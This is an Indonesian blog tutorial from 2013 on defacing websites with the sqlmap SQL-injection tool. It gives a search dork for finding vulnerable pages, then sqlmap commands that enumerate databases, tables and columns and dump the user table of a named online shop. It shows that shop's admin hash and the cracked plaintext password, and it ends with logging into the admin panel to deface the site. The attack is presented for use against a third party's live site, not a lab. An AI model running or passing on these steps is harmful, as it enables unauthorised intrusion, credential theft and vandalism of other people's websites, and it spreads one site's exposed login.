Home » » Deface dengan SQLMAP di win7

Deface dengan SQLMAP di win7

Written By Sumitro Aji Prabowo on Minggu, 12 Mei 2013 | 12.49




Apa itu SQLMap ?


SQLMAP adalah penetrasi open source pengujian alat yang mengotomatisasi proses mendeteksi dan mengeksploitasi kelemahan SQL injection dan mengambil alih server database.
Sekarang tanpa basa-basi lagi kita mulai injeksi dengan sqlmap.

[+] BAHAN [+]


Python DOWNLOAD !
Sqlmap DOWNLOAD
Dork : inurl:/.php?*id=
[+] LANGKAHNYA MBAH BRO [+]

Untuk mengetahui website yang kalian mau Inject itu Vuln atau tidak , silahkan kasih tanda ( ' ) di akhir  url target, contoh : http://vana-shop.com/product.php?c=1 saya tambahin ' menjadi

http://vana-shop.com/product.php?c=1' , nah kalo vuln nanti ada tulisan "you have an erro ...." mysql error dan sebagainya"

sekarang waktunya di hajar kalo udah ketemu web yang vuln :P

1. Setelah instal python, sekarang kalian extrack SQLMAPnya di Drive C:, setelah di extrack buka CMD lalu ketikan :
cd\sqlmap\ , maka hasilnya akan seperti ini :





2. Stelah itu, kalian mulailah scan website target dengan perintah :
sqlmap.py -u http://www.BUGWEBTARGET.com --dbs
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 --dbs , klik [ENTER]




3. Tuh kan keliatan DATABASE nya :D , sekarang waktunya kita scan dengan perintah :
sqlmap.py -u http://TARGET.com -D nama_database -tables
Contoh Target : sqlmap.py -u http://vana-shop.com/product.php?c=1 -D k4735093_vnsh099 --tables , maka hasilnya akan seperti ini :





4. Nah keliatan kan Table di databasenya ? nah sekarang kita scan table tersebut (*cari yang menurut kalian terdapat info tentang user dan pass website) kalo udah yakin disana ada infonya, ketikan perintah :
sqlmap.py -u http://www.TARGETWEBSITE.com -D nama_database -T nama_table --columns
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --columns , tekan enter maka hasilnya akan seperti ini :



5. Nah setelah keliatan Tabelnya sekarang kita ketikan perintah :
sqlmap.py -u http://www.target.com -D nama_database -T nama_table --dump
Contoh Target : sqlmap.py -u http://www.vana-shop.com/product.php?c=1 -D k4735093_vnsh099 -T user --dump , klik enter 

 Jika muncul tulisan seperti ini, ketik "n" lalu tekan enter "tanpa tanda kutip" :
do you want to crack them via a dictionary-based attack? [Y/n/q] 
Maka Hasilnya akan seperti ini :





nah itu kita dapetin User + Passwordnya :D

User : admin
Pass : dfc560ef836a9a63c2bdbfb24a683624

Nah gimana tuh passwordnya kok aneh ? sekarang tugas kalian pecahin itu md5nya :p

Nah setelah saya Decrypt ane dapetin nih :

Pass : dfc560ef836a9a63c2bdbfb24a683624 :: myluckyshop$

Sekarang tinggal login ke admin dan tebas deh :D

http://www.vana-shop.com/admin/

HASIL



Content Creator : Bimo Septiawan a.k.a Cyber404





0 komentar:

Posting Komentar

Like us on Facebook
Follow us on Twitter
Recommend us on Google Plus